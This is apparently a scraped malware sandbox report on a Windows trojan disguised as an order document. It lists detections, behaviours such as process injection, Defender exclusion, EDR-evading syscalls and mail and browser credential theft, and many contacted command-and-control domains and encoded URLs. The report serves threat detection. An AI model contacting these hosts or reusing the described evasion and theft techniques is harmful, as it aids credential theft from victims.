            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467079 Sample: spec 4008670601 AZTEK Order.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 37 www.hellokong.xyz 2->37 39 www.superunicornpalace.com 2->39 41 18 other IPs or domains 2->41 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 Multi AV Scanner detection for submitted file 2->53 57 9 other signatures 2->57 10 spec 4008670601 AZTEK Order.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 35 C:\...\spec 4008670601 AZTEK Order.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 71 Injects a PE file into a foreign processes 10->71 14 spec 4008670601 AZTEK Order.exe 10->14         started        17 powershell.exe 23 10->17         started        19 spec 4008670601 AZTEK Order.exe 10->19         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 21 OFEkXEMCZC.exe 14->21 injected 75 Loading BitLocker PowerShell Module 17->75 24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 21->59 26 compact.exe 13 21->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 OFEkXEMCZC.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 www.hellokong.xyz 203.161.49.220, 49746, 49747, 49748 VNPT-AS-VNVNPTCorpVN Malaysia 29->43 45 epicbazaarhub.com 192.185.208.8, 49737, 49738, 49739 UNIFIEDLAYER-AS-1US United States 29->45 47 11 other IPs or domains 29->47 77 Found direct / indirect Syscall (likely to bypass EDR) 29->77 signatures15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            spec 4008670601 AZTEK Order.exe24%ReversingLabsByteCode-MSIL.Trojan.Generic
            spec 4008670601 AZTEK Order.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.hondamechanic.today/pv57/?7Dihs8p=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Bp=2LpD8tLh0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.hellokong.xyz/oui5/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
            http://searchdiscovered.com/__media__/images/logo.gif)0%Avira URL Cloudsafe
            http://www.rz6grmvv.shop/wvam/?Bp=2LpD8tLh&7Dihs8p=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4=0%Avira URL Cloudsafe
            http://www.hellokong.xyz/oui5/?7Dihs8p=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Bp=2LpD8tLh0%Avira URL Cloudsafe
            http://www.architect-usschool.com/s24g/100%Avira URL Cloudmalware
            http://i3.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
            http://www.epicbazaarhub.com/2769/0%Avira URL Cloudsafe
            https://cdn.consentmanager.net0%Avira URL Cloudsafe
            http://www.tedjp-x.com/rxdf/?7Dihs8p=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Bp=2LpD8tLh0%Avira URL Cloudsafe
            http://www.architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=100%Avira URL Cloudmalware
            http://www.hondamechanic.today/pv57/0%Avira URL Cloudsafe
            http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD100%Avira URL Cloudmalware
            http://www.tedjp-x.com/rxdf/0%Avira URL Cloudsafe
            http://www.ad14.fun/oc7s/?Bp=2LpD8tLh&7Dihs8p=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0=0%Avira URL Cloudsafe
            http://www.rz6grmvv.shop/wvam/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
            https://www.namecheap.com/domains/registration/results/?domain=easybackpage.net0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFc0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/display.cfm0%Avira URL Cloudsafe
            http://www.fondazionegtech.org/jmiz/?Bp=2LpD8tLh&7Dihs8p=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do=0%Avira URL Cloudsafe
            http://www.3cubesinterior.in/n8zi/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe0%Avira URL Cloudsafe
            http://3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXe0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
            http://yg08.gowi0i.xyz100%Avira URL Cloudmalware
            https://delivery.consentmanager.net0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
            http://www.superunicornpalace.com/mwa4/0%Avira URL Cloudsafe
            https://support.hostgator.com/0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
            http://www.easybackpage.net/3jr0/?7Dihs8p=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Bp=2LpD8tLh0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
            http://epicbazaarhub.com/2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4Y0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
            http://www.3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/92z0/0%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/Lehigh_Valley.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2F0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
            https://www.fondazionegtech.org/jmiz/?7Dihs8p=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKK0%Avira URL Cloudsafe
            http://www.hondamechanic.today0%Avira URL Cloudsafe
            https://img.sedoparking.com/templates/images/hero_nc.svg0%Avira URL Cloudsafe
            http://www.artvectorcraft.store/s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLh0%Avira URL Cloudsafe
            http://i3.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
            http://www.mengistiebethlehem.com/92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLh0%Avira URL Cloudsafe
            http://www.easybackpage.net/3jr0/0%Avira URL Cloudsafe
            http://www.ad14.fun/oc7s/0%Avira URL Cloudsafe
            http://www.artvectorcraft.store/s0j2/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.rz6grmvv.shop
            		121.254.178.230
            		truefalse
              		unknown
              ghs.google.com
              		172.217.18.19
              		truefalse
                		unknown
                superunicornpalace.com
                		144.208.124.10
                		truefalse
                  		unknown
                  www.architect-usschool.com
                  		217.160.0.84
                  		truefalse
                    		unknown
                    parkingpage.namecheap.com
                    		91.195.240.19
                    		truefalse
                      		unknown
                      www.hondamechanic.today
                      		64.190.62.22
                      		truefalse
                        		unknown
                        www.mengistiebethlehem.com
                        		208.91.197.13
                        		truefalse
                          		unknown
                          www.ad14.fun
                          		188.114.96.3
                          		truefalse
                            		unknown
                            epicbazaarhub.com
                            		192.185.208.8
                            		truefalse
                              		unknown
                              sitestudio.it
                              		89.31.76.10
                              		truefalse
                                		unknown
                                www.tedjp-x.com
                                		162.43.101.114
                                		truefalse
                                  		unknown
                                  www.hellokong.xyz
                                  		203.161.49.220
                                  		truetrue
                                    		unknown
                                    3cubesinterior.in
                                    		45.113.122.18
                                    		truefalse
                                      		unknown
                                      www.3cubesinterior.in
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.fondazionegtech.org
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.macklaer.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.easybackpage.net
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.epicbazaarhub.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.superunicornpalace.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.artvectorcraft.store
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.hellokong.xyz/oui5/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.architect-usschool.com/s24g/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.hondamechanic.today/pv57/?7Dihs8p=6UcJOPuI3ds3m8dRFaGqe18kk0aRE6C9zfep+6iQQcPKXv8sEJKo1I2dFrwlAwFzKSJLgqMZnt8gW4RLGDqdj2op7I/d7Qwx4DLM/Sb7UzOzABLy3akf6gQBeurdxZRPhPoEffE=&Bp=2LpD8tLhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rz6grmvv.shop/wvam/?Bp=2LpD8tLh&7Dihs8p=ppN4Kg7gaCRo+jf4iLEmna60kcJd+oo7/wZIRMT4+Man5OlGV28GmQNPMVld/mi8klF/kBnYjgc4RUC2chY7WuIAYm4xk+Ll6sKGI2rWgbxJmoqgO5rVx7RJwqzCMQvvfrLjQU4=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hellokong.xyz/oui5/?7Dihs8p=SBbMJInblZiNUqJtj2t3oAZeaf7w1Mr63FaPzYR5npk3jTg+edZF9NME4tF9tViJCHx7c4tSq6N/qcOwzg98IChDG2ekcZOWcYJRK2znKimA3GQ/fbvAwxxdlKlVh8HBUwdv3Sg=&Bp=2LpD8tLhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.epicbazaarhub.com/2769/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwD+tzjHhGgLlyDkrck6XhMS8VcXSbKvpDPBj6V0V8nuLzRy/FwKWDUEv1cw0ImnsIqFnkVImpc8YyZ7gWSicgk/ENTSAvixeUyT+Tq9osdZT4ae7dFHSM=false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.hondamechanic.today/pv57/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tedjp-x.com/rxdf/?7Dihs8p=n5pckC1kDFTF1S5BKIsmiJ5ryDhRlCYaQVQlc2liktwXiyajKP48Wkncu6FoMqtxFtMv+2TSpEcAsDV+dI8BV0td651LvJeUOcJvnAipjtqBUQAoEW2kSo5oIr+iYWP+5LowsUg=&Bp=2LpD8tLhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ad14.fun/oc7s/?Bp=2LpD8tLh&7Dihs8p=ITz00edB1Uq7JDbRPTK5B57t89T2WQZ+hnFFsCQVLpiDf2LeJizgG+jH2jz5I+TBlRR/yAoHWWMQTB4d0WCMdZHpvgPMtRMFWqdBjyYGuisLgsnAd4XsPoSnl82L2CWvs48fsL0=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tedjp-x.com/rxdf/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rz6grmvv.shop/wvam/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fondazionegtech.org/jmiz/?Bp=2LpD8tLh&7Dihs8p=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.3cubesinterior.in/n8zi/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.superunicornpalace.com/mwa4/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.easybackpage.net/3jr0/?7Dihs8p=C6nbN3Z6SrmD48dKFL5Pdr+cZFmYp1QsQ3e628IyGZcRZCB2vhKb6ox4g6I37OYbmAVSFMbRXnVDWcusSAPk0vfQfIagm0ASlZK02lSA38wn9PDfH1oUKWJrxTMbBcOAU+1qziI=&Bp=2LpD8tLhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXePjBpDkk8R6CbNZjNtV+M1xTH1M7WEFVhsxtrVg+jjfEC0sBsxKcDNAG8QmzJp6ywkUHIkWAXYoQO53dC+2pPrw=false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mengistiebethlehem.com/92z0/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.artvectorcraft.store/s0j2/?7Dihs8p=BcB93STIeRzesDqYzmgjF/8Aqg2qoGbugvfC7gVQd0Epq+RTfyEF6eLz+ZShIqPWgjFYuR+pkePM3whd8giEyH2988JCuLY+vIFLWxAqbBoWpgzIu1DPnhlaAUBnkOtEvd711RA=&Bp=2LpD8tLhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mengistiebethlehem.com/92z0/?7Dihs8p=Gchg326o6RWN/XFADw/V4eD2MO3apSP8yQOPkbolGTbWXGJL1kFLipwvr6KFDeoH1MC+XiIJPCdl50bZjywkZNBk97uFxrq9QGi9z8UXs1GhAfMLlFrOVkcHu0q9EP6WPl8Zh5k=&Bp=2LpD8tLhfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.easybackpage.net/3jr0/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.artvectorcraft.store/s0j2/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ad14.fun/oc7s/false
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabcompact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://searchdiscovered.com/__media__/images/logo.gif)compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/pics/28903/search.png)compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.consentmanager.netcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://architect-usschool.com/s24g/?Bp=2LpD8tLh&7Dihs8p=4rIlPCx72NWCI0QJXJwDcompact.exe, 0000000C.00000002.4563338371.0000000004AF0000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.00000000039E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.namecheap.com/domains/registration/results/?domain=easybackpage.netcompact.exe, 0000000C.00000002.4563338371.0000000004C82000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mengistiebethlehem.com/Moravia.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbe1UYWx%2FFitbFccompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcompact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mengistiebethlehem.com/display.cfmcompact.exe, 0000000C.00000002.4566009011.00000000067A0000.00000004.00000800.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://3cubesinterior.in/n8zi/?Bp=2LpD8tLh&7Dihs8p=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTXecompact.exe, 0000000C.00000002.4563338371.0000000005138000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000004028000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namespec 4008670601 AZTEK Order.exe, 00000000.00000002.2115615694.0000000002A27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.mengistiebethlehem.com/Christmas_City_Studio.cfm?fp=rb9JssZzcqrxgVbtqj8jg7AT9cR7GfkC5tZbecompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://yg08.gowi0i.xyzcompact.exe, 0000000C.00000002.4563338371.00000000044A8000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003398000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://delivery.consentmanager.netcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://support.hostgator.com/compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://epicbazaarhub.com/2769/?7Dihs8p=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4Ycompact.exe, 0000000C.00000002.4563338371.000000000463A000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.000000000352A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/pics/29590/bg1.png)compact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icocompact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffcompact.exe, 0000000C.00000002.4563338371.0000000004316000.00000004.10000000.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4562295405.0000000003206000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=compact.exe, 0000000C.00000003.2714950791.00000000082A8000.00000004.00000020.00020000.00000000.sdmpfalse
